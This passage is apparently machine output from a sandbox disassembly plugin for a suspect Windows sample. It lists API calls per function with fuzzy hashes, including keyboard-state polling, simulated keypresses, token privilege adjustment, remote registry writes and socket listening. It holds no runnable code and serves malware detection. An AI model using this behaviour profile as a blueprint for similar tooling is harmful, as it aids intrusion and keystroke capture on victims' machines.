                        • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                      • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                      Similarity
                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                      • String ID: @GUI_DRAGID$F$pbL
                      • API String ID: 3977979337-2097280626
                      Similarity
                      • API ID: _memmove$_memset
                      • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                      • API String ID: 1357608183-1426331590
                      APIs
                      • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                      • IsIconic.USER32(?), ref: 0043D66E
                      • ShowWindow.USER32(?,00000009), ref: 0043D67B
                      • SetForegroundWindow.USER32(?), ref: 0043D685
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                      • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                      • SetForegroundWindow.USER32(?), ref: 0043D6D2
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                      • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                      • keybd_event.USER32(00000012,00000000), ref: 0043D701
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                      • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                      • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                      • SetForegroundWindow.USER32(?), ref: 0043D721
                      • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                      Similarity
                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 4125248594-2988720461
                      APIs
                        • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                        • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                        • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                      • _memset.LIBCMT ref: 00458353
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                      • CloseHandle.KERNEL32(?), ref: 004583B6
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                      • GetProcessWindowStation.USER32 ref: 004583E6
                      • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                        • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                        • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                      Similarity
                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                      • String ID: $default$winsta0
                      • API String ID: 2063423040-1027155976
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                      • FindClose.KERNEL32(00000000), ref: 0046C7E1
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                      • __swprintf.LIBCMT ref: 0046C890
                      • __swprintf.LIBCMT ref: 0046C8D3
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • __swprintf.LIBCMT ref: 0046C927
                        • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                      • __swprintf.LIBCMT ref: 0046C975
                        • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                        • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                      • __swprintf.LIBCMT ref: 0046C9C4
                      • __swprintf.LIBCMT ref: 0046CA13
                      • __swprintf.LIBCMT ref: 0046CA62
                      Similarity
                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                      • API String ID: 3953360268-2428617273
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0046EFB6
                      • _wcscmp.LIBCMT ref: 0046EFCB
                      • _wcscmp.LIBCMT ref: 0046EFE2
                      • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                      • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                      • FindClose.KERNEL32(00000000), ref: 0046F031
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                      • _wcscmp.LIBCMT ref: 0046F074
                      • _wcscmp.LIBCMT ref: 0046F08B
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                      • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                      • FindClose.KERNEL32(00000000), ref: 0046F0D2
                      • FindClose.KERNEL32(00000000), ref: 0046F0E4
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1803514871-438819550
                      APIs
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                      • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                      • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                      Similarity
                      • API ID: Close$ConnectCreateRegistryValue
                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                      • API String ID: 536824911-966354055
                      Similarity
                      • API ID:
                      • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                      • API String ID: 0-559809668
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0046F113
                      • _wcscmp.LIBCMT ref: 0046F128
                      • _wcscmp.LIBCMT ref: 0046F13F
                        • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                      • FindClose.KERNEL32(00000000), ref: 0046F179
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                      • _wcscmp.LIBCMT ref: 0046F1BC
                      • _wcscmp.LIBCMT ref: 0046F1D3
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                      • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                      • FindClose.KERNEL32(00000000), ref: 0046F21A
                      • FindClose.KERNEL32(00000000), ref: 0046F22C
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 1824444939-438819550
                      APIs
                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                      • __swprintf.LIBCMT ref: 0046A231
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                      • _memset.LIBCMT ref: 0046A2B2
                      • _wcsncpy.LIBCMT ref: 0046A2EE
                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                      • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                      • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                      • CloseHandle.KERNEL32(00000000), ref: 0046A341
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                      • String ID: :$\$\??\%s
                      • API String ID: 2733774712-3457252023
                      • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                      • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                      • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                      • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                      APIs
                      • GetKeyboardState.USER32(?), ref: 00460097
                      • SetKeyboardState.USER32(?), ref: 00460102
                      • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                      • GetKeyState.USER32(000000A0), ref: 00460139
                      • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                      • GetKeyState.USER32(000000A1), ref: 00460179
                      • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                      • GetKeyState.USER32(00000011), ref: 004601B3
                      • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                      • GetKeyState.USER32(00000012), ref: 004601EA
                      • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                      • GetKeyState.USER32(0000005B), ref: 00460221
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                      • Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
                      • Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
                      • Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B
                      APIs
                        • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                      • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                      • String ID:
                      • API String ID: 1240663315-0
                      • Opcode ID: 116fd98b7db5d4140f84f63bf656e98fd661c9680a52bbeb151917b92e487117
                      • Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
                      • Opcode Fuzzy Hash: 116fd98b7db5d4140f84f63bf656e98fd661c9680a52bbeb151917b92e487117
                      • Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                      • Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
                      • Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
                      • Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                      • Sleep.KERNEL32(0000000A), ref: 0046F470
                      • _wcscmp.LIBCMT ref: 0046F484
                      • _wcscmp.LIBCMT ref: 0046F49F
                      • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                      • FindClose.KERNEL32(00000000), ref: 0046F553
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                      • String ID: *.*
                      • API String ID: 713712311-438819550
                      • Opcode ID: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                      • Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
                      • Opcode Fuzzy Hash: 92a288f11230d480a522b0c0f936cc6b9b9cd0aeee01b41ae93ea83b3e82efad
                      • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __itow__swprintf
                      • String ID: 3cA$_A
                      • API String ID: 674341424-3480954128
                      • Opcode ID: a5756b0f92f9e2bfb68cf9ef7b4beb393605c20eebfb30cb75c238e5a0399993
                      • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                      • Opcode Fuzzy Hash: a5756b0f92f9e2bfb68cf9ef7b4beb393605c20eebfb30cb75c238e5a0399993
                      • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                      APIs
                        • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                        • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                        • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                      • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                      • String ID: $@$SeShutdownPrivilege
                      • API String ID: 2234035333-194228
                      • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                      • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                      • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                      • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                      • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                      • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                      • listen.WSOCK32(00000000,00000005), ref: 00476316
                      • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                      • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$bindclosesocketlistensocket
                      • String ID:
                      • API String ID: 1279440585-0
                      • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                      • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                      • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                      • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                      APIs
                        • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                        • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                      • _memmove.LIBCMT ref: 00450258
                      • _memmove.LIBCMT ref: 0045036D
                      • _memmove.LIBCMT ref: 00450414
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                      • String ID:
                      • API String ID: 1300846289-0
                      • Opcode ID: 4ff26fd221bb68c5114e90bbcabe878cf0622c85d295742c9c0d1e5c1d30364e
                      • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                      • Opcode Fuzzy Hash: 4ff26fd221bb68c5114e90bbcabe878cf0622c85d295742c9c0d1e5c1d30364e
                      • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                      • GetSysColor.USER32(0000000F), ref: 00401A4E
                      • SetBkColor.GDI32(?,00000000), ref: 00401A61
                        • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ColorProc$LongWindow
                      • String ID:
                      • API String ID: 3744519093-0
                      • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                      • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                      • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                      • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                      APIs
                        • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                      • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                      • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                      • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                      • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                      • String ID:
                      • API String ID: 99427753-0
                      • Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                      • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                      • Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                      • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                      APIs
                      Memory Dump Source
